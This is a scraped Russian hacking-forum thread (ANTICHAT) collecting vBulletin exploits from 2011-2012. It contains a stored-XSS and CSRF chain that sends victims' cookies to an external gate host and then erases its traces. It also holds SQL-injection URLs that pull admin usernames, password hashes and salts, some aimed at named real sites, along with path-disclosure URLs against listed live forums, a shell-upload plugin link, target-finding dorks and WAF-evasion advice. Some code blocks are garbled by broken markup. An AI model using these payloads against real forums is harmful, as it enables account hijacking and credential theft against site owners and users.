ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости CMS / форумов (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   [Обзор уязвимостей vBulletin] (https://forum.antichat.xyz/showthread.php?t=22852)

justonline 25.12.2011 23:28

Opinion System 1.5.0


Имеется пассивноактивная? xss... после того, как оставили мнение с js при каждом переходе на страницу с мнением будет выполняться этот код, так как он подгружается в строку редактирования. У других отображен не будет. фильтр спец символов.

Для использования достаточно сформировать запрос на добавление мнения и редиректнуть его на страничку с мнениями... для отвода глаз

Дорк

Цитата:

Сообщение от None
vbulletin inurl: opinion . php


M_script 28.12.2011 23:48

Цитата:

Сообщение от justonline
Для использования достаточно сформировать запрос на добавление мнения и редиректнуть его на страничку с мнениями... для отвода глаз

Не все так просто.

Приведу пример практической эксплуатации бага:

1. Добавление мнения

POST-запрос

opinion.php

do=postvote&postid=[POSTID]&comment=[COMMENT]&value=0

Защита от CSRF - проверка домена рефера. Если в заголовке вообще нет рефера, запрос тоже срабатывает.

a) [POSTID]

opinion.php?do=about&userid=[USERID]

Цитата:

Сообщение от None


Во время атаки код XSS некоторое время будет храниться на стене одного из пользователей.

Кто именно это будет, не имеет значения ([USERID] - любой существующий пользователь)

b) Автоматическая отправка запроса

PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/
COLOR][/COLOR

Для обхода проверки рефера форма шифруется с помощью протокола data (data:text/html;base64,[форма_отправки_запроса])

2. Отображение мнения на странице

opinion.php?do=about&userid=[USERID]

Цитата:

Сообщение от None


Для выполнения кода можно использовать "autofocus/onfocus="[JS].

Цитата:

Сообщение от None


3. Код для проведения атаки

На странице мнений для удаления есть встроенная JS-функция, она и будет использована для уничтожения следов атаки. После вызова функции удаления страница очищается, чтобы избежать зацикливания onfocus.

PHP код:

[COLOR="#000000"][COLOR="#0000BB"]myGate[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'http://example.com/?cookie='[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]// сюда отправляются куки

[/COLOR][COLOR="#0000BB"]pBody[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]getElementsByTagName[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'body'[/COLOR][COLOR="#007700"])[[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]delFunc[/COLOR][COLOR="#007700"]= /[/COLOR][COLOR="#0000BB"]ChangeText[/COLOR][COLOR="#007700"]\([/COLOR][COLOR="#DD0000"]'do=delete.+?\)/.exec(pBody.innerHTML); // парсим со страницы функцию удаления мнения

pBody.innerHTML += '
[/COLOR][COLOR="#007700"][/COLOR][COLOR="#DD0000"]'; // отправка данных на гейт, удаление мнения, очистка страницы

[/COLOR][/COLOR] 

Мнения ограничены по длине, поэтому вышеприведенный код необходимо вынести в отдельный скрипт.

a) убираем все лишнее

Цитата:

Сообщение от None
g='http://example.com/?cookie=';b=document.getElementsByTagName('body')[0];b.innerHTML+='';//

b) шифруем в base64

Код:

Zz0naHR0cDovL2V4YW1wbGUuY29tLz9jb29raWU9JztiPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdib2R5JylbMF07Yi5pbm5lckhUTUwrPSc8aW1nIHNyYz0iJytnK2VzY2FwZShkb2N1bWVudC5jb29raWUpKycib25lcnJvcj0iJysvQ2hhbmdlVGV4dFwoJ2RvPWRlbGV0ZS4rP1wpLy5leGVjKGIuaW5uZXJIVE1MKSsnO2RvY3VtZW50LndyaXRlKFwnXCcpIj4nOy8v
c) помещаем код в короткую ссылку используя протокол data и сервис сокращения tinyurl

Код:

http://tinyurl.com/c6opgyk
d) подключаем скрипт

PHP код:

[COLOR="#000000"][COLOR="#0000BB"]newScript[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]createElement[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'script'[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]newScript[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]src[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'http://tinyurl.com/c6opgyk'[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]getElementsByTagName[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'body'[/COLOR][COLOR="#007700"])[[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#0000BB"]appendChild[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]newScript[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR

e) окончательный вариант комментария

Цитата:

Сообщение от None
"autofocus/onfocus="s=document.createElement('script');s.src= '//tinyurl.com/c6opgyk';document.getElementsByTagName('body')[0].appendChild(s);

4. Последовательное выполнение CSRF и XSS

PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

function[/
COLOR][COLOR="#0000BB"]srcReplace[/COLOR][COLOR="#007700"]()

{

var[/COLOR][COLOR="#0000BB"]i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]getElementById[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'ifr'[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]i[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]onload[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]i[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]src[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'http://site/opinion.php?do=about&userid=[USERID]'[/COLOR][COLOR="#007700"];

}

[/
COLOR][COLOR="#0000BB"]

[/
COLOR]

[/
COLOR

5. Полная автоматизация уязвимости

[POSTID] действует относительно недолго, поэтому все вышеописанное будет работать только для одной атаки на конкретного пользователя.

Чтобы полностью все автоматизировать, придется парсить http://site/opinion.php?do=about&userid=[USERID] и динамически генерировать код из пункта 5 на своем сервере, например PHP-скриптом.

PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/
COLOR][/COLOR

p.s.:

Заставить все это работать кроссбраузерно - задача тоже относительно непростая.

Описывать специфику работы различных браузеров с data и другие варианты скрытия реферера здесь не буду, потому что получится слишком много инфы для одного оффтопного сообщения.

justonline 29.12.2011 16:08

Цитата:

Сообщение от M_script
Не все так просто.
Приведу пример практической эксплуатации бага:
................................

мои комплименты. хорошая пища для повышения качества своих знаний, спасибо

Fooog 24.01.2012 00:43

Обычно (90%) в нижнем углу написано "Администрирование".

Клацните туда и попадете в админку.

eman 24.01.2012 23:12

Цитата:

Сообщение от Fooog
Обычно (90%) в нижнем углу написано "Администрирование".
Клацните туда и попадете в админку.

Поправлю вас, "Управление"

Цитата:

Сообщение от Cherep
уже попытался, та нихера, видать говнари-админы тупо не сменили пути в исходнике

Может просто футер потерли, в целях безопастности.. а так, зайдите к пользователю в профиль, -> редактировать, откроеться админка (если прописана в config.php), или попробуйте выдать нарушение, откроеться модерка.. (только я не знаю, можно ли с модеркой дальше работать)

Cherep 25.01.2012 22:03

Цитата:

Сообщение от eman
Поправлю вас, "Управление"
Может просто футер потерли, в целях безопастности.. а так, зайдите к пользователю в профиль, -> редактировать, откроеться админка (если прописана в config.php), или попробуйте выдать нарушение, откроеться модерка.. (только я не знаю, можно ли с модеркой дальше работать)

как я понял, в конфиге она не прописана Мб её вообще стерли нахер

-morfiy- 27.01.2012 01:10

зайдите под админом, дождитесь админа и посмотрите пути админки через "кто на сайте"

eman 10.02.2012 22:05

vBulletin 4.1.10 Full Path Disclosure

[Info]

# Author: linc0ln.dll

# Exploit Title: vBulletin 4.1.10 Full Path Disclosure

# Date: 16/01/2012

# Vendor or Software Link: http://www.vbulletin.com/# Category: WebApp

# Version: 4.1.10

# Contact: linc@tormail.net

# Website: linc6.wordpress.com

# Greetings to: Mario_Vs | fir3 | fight3r | artii2 | pok3 | Upgreydd |VoltroN | amiugly | b00y4k4 |

[Vulnerability]

# Full Path Disclosure:

Цитата:

Сообщение от None
http://localhost/path/forumdisplay.php?do[]=linc0ln.dll

Цитата:

Сообщение от None
http://localhost/path/calendar.php?do[]=linc0ln.dll

Цитата:

Сообщение от None
http://localhost/path/search.php?do[]=linc0ln.dll

demo

Цитата:

Сообщение от None
https://forum.4game.ru/forumdisplay.php?do[]=linc0ln.dll


M_script 11.02.2012 09:16

Цитата:

Сообщение от Melo
что дает нам это уязвимость?

Написано же "Full Path Disclosure". Раскрытие пути к скрипту на сервере.

OxoTnik 29.02.2012 04:17

АктивнаяXSS

Уязвимы все версий

Требуются права модератора

Идём

Панель модератора -> Управление разделами -> Объявление [Редактировать]

Рабочий пример (проверка на работоспособность)

Цитата:

Сообщение от None


Эксплуатация обычная

Цитата:

Сообщение от None
img = new Image(); img.src = "http://sniffer.ru/s.php?"+document.cookie;


Isis 06.03.2012 17:55

Цитата:

Сообщение от OxoTnik
Активная
XSS
Уязвимы все версий
Требуются права модератора
Идём
Панель модератора -> Управление разделами -> Объявление [
Редактировать
]
Рабочий пример (проверка на работоспособность)
Эксплуатация обычная

Америку открыл. Это не XSS, а фича. На ачате тоже работает.

faza02 16.03.2012 15:56

Цитата:

Сообщение от Spunoff
Если получить куки админа форума, в админку же всё равно будет повторно требоватся ввод пароля? Это можно обойти?

если админ заходил в admincp до этого, то куки будут с админкой, правда они не долго живут.

Ereee 18.03.2012 21:49

Цитата:

Сообщение от pharm_all
4.1.4 есть что-то может народ? 4.1.0-4.1.3 уже прикрыли скуль , может есть что-то в привате под новые версии рассмотрел бы . Пишите в личку!

В 4.1.4 тоже SQL-inj есть. Смотри Patchlevel в vbulletin_global.js. Если там просто "Vbulletin 4.1.4", то радуйся. А если рядом написано "Patchlevel n", то можешь др. способы искать.

pharm_all 28.03.2012 05:23

vBulletin 4.1.7 => 4.1.10 XSS Vulnerability

Vulnerability:

1.

Send New Private Message >

>

Message text > %22%3E%3Cscript%3Ealert('XSS')%3C/script%3E (encode script UTF-8)

Watch the video: [http://vimeo.com/39049790]

1337day.com/exploits/17824

Ereee 29.03.2012 08:03

Цитата:

Сообщение от IMMORTAL_S
На одном ip висят 4.1.2, 4.1.3 PL1, 4.1.4.. пытался на всех провести sql-inj но выдает Forbidden.
С чем это может быть связано?

WAF мешает. Попробуй обойти.

stan0009 19.04.2012 21:11

Да нет вопросов

Поехали

EasyPage SQL-Injection​


Google Dork: intext:"vbulletin" inurl:"page.php?p=" [Result: 18 000]

File: /page.php

PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][...]

[/
COLOR][COLOR="#0000BB"]$pageid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p'[/COLOR][COLOR="#007700"]];

[...]

[/
COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$vbulletin[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query_first[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"

SELECT *

FROM "
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]TABLE_PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"easy_pages

WHERE varname = '[/COLOR][COLOR="
#0000BB"]$pageid[/COLOR][COLOR="#DD0000"]'

LIMIT 1

"[/COLOR][COLOR="#007700"]);

[...][/COLOR][/COLOR

PoC:

PHP код:

[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//stavropolregion.com/page.php?p=stavrop%27%20and%201=2%20union%20select%201,2,3,%28select+concat_ws%280x3b,username,password,salt%29+from+user+where+usergroupid=6%20limit%201%29,5%20--%20f[/COLOR][/COLOR] 

File: /admincp/easy_pages_admin.php

PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][...]

if ([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'do'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'edit'[/COLOR][COLOR="#007700"])

{

[/
COLOR][COLOR="#0000BB"]$pageid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pageid'[/COLOR][COLOR="#007700"]];



[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query_first[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"

SELECT *

FROM "
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]TABLE_PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"easy_pages

WHERE pageid =[/COLOR][COLOR="
#0000BB"]$pageid[/COLOR][COLOR="#DD0000"]
LIMIT 1

"[/COLOR][COLOR="#007700"]);

[...][/COLOR][/COLOR

PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][...]

if ([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'do'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'edit_update'[/COLOR][COLOR="#007700"]){



[/COLOR][COLOR="#0000BB"]$title[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]addslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]]);

[/
COLOR][COLOR="#0000BB"]$varname[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]addslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'varname'[/COLOR][COLOR="#007700"]]);

[/
COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]addslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'content'[/COLOR][COLOR="#007700"]]);



[/COLOR][COLOR="#0000BB"]$vbulletin[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query_write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"UPDATE "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]TABLE_PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"easy_pages

SET title = '[/COLOR][COLOR="
#0000BB"]$title[/COLOR][COLOR="#DD0000"]',

varname = '[/COLOR][COLOR="#0000BB"]$varname[/COLOR][COLOR="#DD0000"]',

content = '[/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#DD0000"]',

table_wrap = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'table_wrap'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]"'

WHERE pageid = "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]pageid[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]";

"[/COLOR][COLOR="#007700"]);



[/COLOR][COLOR="#0000BB"]print_cp_redirect[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'easy_pages_admin.php'[/COLOR][COLOR="#007700"]);

}

[...][/
COLOR][/COLOR

PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][...]

if ([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'do'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'add_update'[/COLOR][COLOR="#007700"]){



[/COLOR][COLOR="#0000BB"]$title[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]addslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]]);

[/
COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]addslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'content'[/COLOR][COLOR="#007700"]]);

[/
COLOR][COLOR="#0000BB"]$varname[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]addslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'varname'[/COLOR][COLOR="#007700"]]);

[/
COLOR][COLOR="#0000BB"]$vbulletin[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query_write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"INSERT INTO "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]TABLE_PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"easy_pages

SET title = '[/COLOR][COLOR="
#0000BB"]$title[/COLOR][COLOR="#DD0000"]',

varname = '[/COLOR][COLOR="#0000BB"]$varname[/COLOR][COLOR="#DD0000"]',

content = '[/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#DD0000"]',

table_wrap = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'table_wrap'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]"'

"[/COLOR][COLOR="#007700"]);





[/COLOR][COLOR="#0000BB"]print_cp_redirect[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'easy_pages_admin.php'[/COLOR][COLOR="#007700"]);

}

[...][/
COLOR][/COLOR

PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][...]

if ([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'do'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'delete_page'[/COLOR][COLOR="#007700"]){



[/COLOR][COLOR="#0000BB"]$vbulletin[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query_write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"DELETE FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]TABLE_PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"easy_pages WHERE pageid = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pageid'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]"' LIMIT 1"[/COLOR][COLOR="#007700"]);



[/COLOR][COLOR="#0000BB"]print_cp_redirect[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'easy_pages_admin.php'[/COLOR][COLOR="#007700"]);



}

[...][/
COLOR][/COLOR

Было успешно найдено

(c) Boolean, 0x0000ed.com, 2012.

Было успешно взято

(с) Grabberz.com

In_flames 02.07.2012 15:26

vBulletin 3.8.x

Цитата:

Сообщение от None
/arcade.php?act=Arcade&do=stats&comment=a&s_id=1%20 AND%20%28SELECT%201%20FROM%20%28SELECT%20COUNT%28* %29,CONCAT%28%28SELECT%20CONCAT%28email,%20userid, %200x3a,%20username,%200x3a,%20password,0x3a,salt% 29%20FROM%20user%20WHERE%20id%20=%201%29,FLOOR%28R AND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CH ARACTER_SETS%20GROUP%20BY%20x%29a%29

PHP код:

[COLOR="#000000"][COLOR="#0000BB"]$ibforums[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]input[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'s_id'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]ibp_cleansql[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ibforums[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]input[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'s_id'[/COLOR][COLOR="#007700"]] );

[/
COLOR][/COLOR

Раскрытие путей

Цитата:

Сообщение от None
http://localhost/search.php?do[]=1337
http://localhost/profile.php?do[]=1337
http://localhost/subscription.php?do[]=1337


Export 15.07.2012 18:25

Раскрытие путей в последней версии(4.2.0)

Нужны как минимум права модера.

Код:

http://localhost/modcp/index.php?do[]=head
https://localhost/modcp/index.php?do[]=home


Br@!ns 23.08.2012 02:46

Заливка шелла в 4.0.7 плюс\минус

Требуется доступ в админку.

Код HTML:

Заходим в админку
Продукты и модули -> Сохранить\загрузить модули
Выбираем плагин-шелл (приложен снизу).
Устанавливаем.
Переходим в Коммерческая подписка -> Управление подпиской

http://www.sendspace.com/file/rz0609

VY_CMa 27.10.2012 20:44

Цитата:

Сообщение от Artyomka27
Есть что на vBulletin® Version 4.1.12 ?

Цитата:

Сообщение от None
Author : IrIsT.Ir
Discovered By : Am!r
Home : http://IrIsT.Ir/forum
Software Link : http://www.Vbulletin.com/
Security Risk : High
Version : All Version
Tested on : GNU/Linux Ubuntu - Windows Server - win7
Dork : intext:"Powered By Vbulletin 4.1.12"

Exp.

PHP код:

[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//target.com/includes/blog_plugin_useradmin.php?do=usercss&u=[Sql][/COLOR][/COLOR] 


eman 25.11.2012 08:27

vBulletin ChangUonDyU Advanced Statistics SQL Injection Vulnerability

# Exploit Title: vBulletin ChangUonDyU Advanced Statistics - SQL Injection

Vulnerability

# Google Dork: No Dork

# Date: 19/10/2012

# Exploit Author: Juno_okyo

# Vendor Homepage: http://hoiquantinhoc.com

# Software Link:

http://hoiquantinhoc.com/modifications-3-8-x/4468-changuondyu-advanced-statistics-6-0-1-a.html

# Version: vBulletin 3 & 4

# Tested on: Windows 7

# CVE : http://www.vbulletin.com/

#

################################################## ############################################

Vulnerability:

################################################## ############################################

SQL Injection was found in ChangUonDyU Advanced Statistics.

Query on ajax.php

################################################## ############################################

Exploitation:

################################################## ############################################

ajax.php?do=inforum&listforumid=100) UNION SELECT

1,concat_ws(0x7c,user(),database(),version()),3,4, 5,6,7,8,9,10-- -&result=20

or:

ajax.php?do=inforum&listforumid=100) UNION SELECT

1,2,3,4,5,6,concat_ws(0x7c,username,password,salt) ,8,9,10,11 from user

where userid=1-- -&result=20

################################################## ############################################

Ex:

################################################## ############################################

http://server/f/ajax.php?do=inforum&listforumid=100%29%20UNION%20S ELECT%201,concat_ws%280x7c,user%28%29,database%28% 29,version%28%29%29,3,4,5,6,7,8,9,10--%20-&result=20

################################################## ############################################

More Details:

################################################## ############################################

Website: http://junookyo.blogspot.com/

About Exploit:

http://junookyo.blogspot.com/2012/10/vbb-changuondyu-advanced-statistics-sql.html

################################################## ############################################

Great thanks to James, Juno_okyo & J2TeaM, VNHack Group

################################################## ############################################

n0n@me 17.12.2012 02:13

vBulletin 4.2.0 Full Path Disclosure Vulnerability

Код:

The Full Path Disclosure is vBulletin 4.2.0, in forumrunner. With Full Path Disclosure you can get the path to the forum you're in and also (most of the times is the same) cpanel's username.   
To see it go to:  http://[path]/forumrunner/include/album.php 
It works in 90% of the forums.   

Example:
http://www.mgcproducts.com/forumrunner/include/album.php http://atheistdiscussion.com/forumrunner/include/album.php http://apolyton.net/forumrunner/include/album.php http://www.romaniancommunity.net/forumrunner/include/album.php http://www.ghosthax.com/forumrunner/include/album.php http://www.reddotcity.net/forumrunner/include/album.php http://www.sevenskins.com/forum/forumrunner/include/album.php http://www.purevb.com/forumrunner/include/album.php http://forum.hackersbrasil.com.br/forumrunner/include/album.php

vBulletin 4.x/5.x multiple Full Puth Disclosure Vuln

Код:

/includes/api/commonwhitelist_2.php
/includes/api/commonwhitelist_5.php
/includes/api/commonwhitelist_6.php
/includes/api/1/album_album.php
/includes/api/1/album_editalbum.php
/includes/api/1/album_latest.php
/includes/api/1/album_overview.php
/includes/api/1/album_picture.php
/includes/api/1/album_user.php
/includes/api/1/announcement_edit.php
/includes/api/1/announcement_view.php
/includes/api/1/api_cmscategorylist.php
/includes/api/1/api_cmssectionlist.php
/includes/api/1/api_forumlist.php
/includes/api/1/api_getnewtop.php
/includes/api/1/api_getsecuritytoken.php
/includes/api/1/api_getsessionhash.php
/includes/api/1/api_init.php
/includes/api/1/api_mobilepublisher.php
/includes/api/1/api_usersearch.php
/includes/api/1/blog_blog.php
/includes/api/1/blog_bloglist.php
/includes/api/1/blog_comments.php
/includes/api/1/blog_custompage.php
/includes/api/1/blog_dosendtofriend.php
/includes/api/1/blog_list.php
/includes/api/1/blog_members.php
/includes/api/1/blog_post_comment.php
/includes/api/1/blog_post_editblog.php
/includes/api/1/blog_post_editcomment.php
/includes/api/1/blog_post_edittrackback.php
/includes/api/1/blog_post_newblog.php
/includes/api/1/blog_post_postcomment.php
/includes/api/1/blog_post_updateblog.php
/includes/api/1/blog_sendtofriend.php
/includes/api/1/blog_subscription_entrylist.php
/includes/api/1/blog_subscription_userlist.php
/includes/api/1/blog_usercp_addcat.php
/includes/api/1/blog_usercp_editcat.php
/includes/api/1/blog_usercp_editoptions.php
/includes/api/1/blog_usercp_editprofile.php
/includes/api/1/blog_usercp_modifycat.php
/includes/api/1/blog_usercp_updateprofile.php
/includes/api/1/editpost_editpost.php
/includes/api/1/editpost_updatepost.php
/includes/api/1/forum.php
/includes/api/1/forumdisplay.php
/includes/api/1/inlinemod_domergeposts.php
/includes/api/1/list.php
/includes/api/1/login_lostpw.php
/includes/api/1/member.php
/includes/api/1/memberlist_search.php
/includes/api/1/misc_showattachments.php
/includes/api/1/misc_whoposted.php
/includes/api/1/newreply_newreply.php
/includes/api/1/newreply_postreply.php
/includes/api/1/newthread_postthread.php
/includes/api/1/newthread_newthread.php
/includes/api/1/poll_newpoll.php
/includes/api/1/poll_polledit.php
/includes/api/1/poll_showresults.php
/includes/api/1/private_editfolders.php
/includes/api/1/private_insertpm.php
/includes/api/1/private_messagelist.php
/includes/api/1/private_newpm.php
/includes/api/1/private_showpm.php
/includes/api/1/private_trackpm.php
/includes/api/1/profile_editattachments.php
/includes/api/1/profile_editoptions.php
/includes/api/1/profile_editprofile.php
/includes/api/1/register_addmember.php
/includes/api/1/register_checkdate.php
/includes/api/1/search_process.php
/includes/api/1/search_showresults.php
/includes/api/1/showthread.php
/includes/api/1/subscription_addsubscription.php
/includes/api/1/subscription_editfolders.php
/includes/api/1/subscription_viewsubscription.php
/includes/api/1/threadtag_managetags.php
/includes/api/2/album_picture.php
/includes/api/2/api_blogcategorylist.php
/includes/api/2/blog_blog.php
/includes/api/2/blog_bloglist.php
/includes/api/2/blog_list.php
/includes/api/2/blog_subscription_entrylist.php
/includes/api/2/blog_subscription_userlist.php
/includes/api/2/blog_usercp_groups.php
/includes/api/2/content.php
/includes/api/2/editpost_editpost.php
/includes/api/2/forumdisplay.php
/includes/api/2/member.php
/includes/api/2/newreply_newreply.php
/includes/api/2/forum.php
/includes/api/2/poll_newpoll.php
/includes/api/2/poll_polledit.php
/includes/api/2/poll_showresults.php
/includes/api/2/private_messagelist.php
/includes/api/2/private_trackpm.php
/includes/api/2/profile_editattachments.php
/includes/api/2/search_showresults.php
/includes/api/2/showthread.php
/includes/api/3/api_gotonewpost.php
/includes/api/4/album_user.php
/includes/api/4/api_forumlist.php
/includes/api/4/api_getnewtop.php
/includes/api/4/breadcrumbs_create.php
/includes/api/4/facebook_getforumid.php
/includes/api/4/facebook_getnewforummembers.php
/includes/api/4/get_vbfromfacebook.php
/includes/api/4/login_facebook.php
/includes/api/4/newreply_postreply.php
/includes/api/4/newthread_postthread.php
/includes/api/4/register.php
/includes/api/4/register_addmember.php
/includes/api/4/search_findusers.php
/includes/api/4/subscription_viewsubscription.php
/includes/api/5/api_init.php
/includes/api/6/api_getnewtop.php
/includes/api/6/api_gotonewpost.php
/includes/api/6/content.php
/includes/api/6/member.php
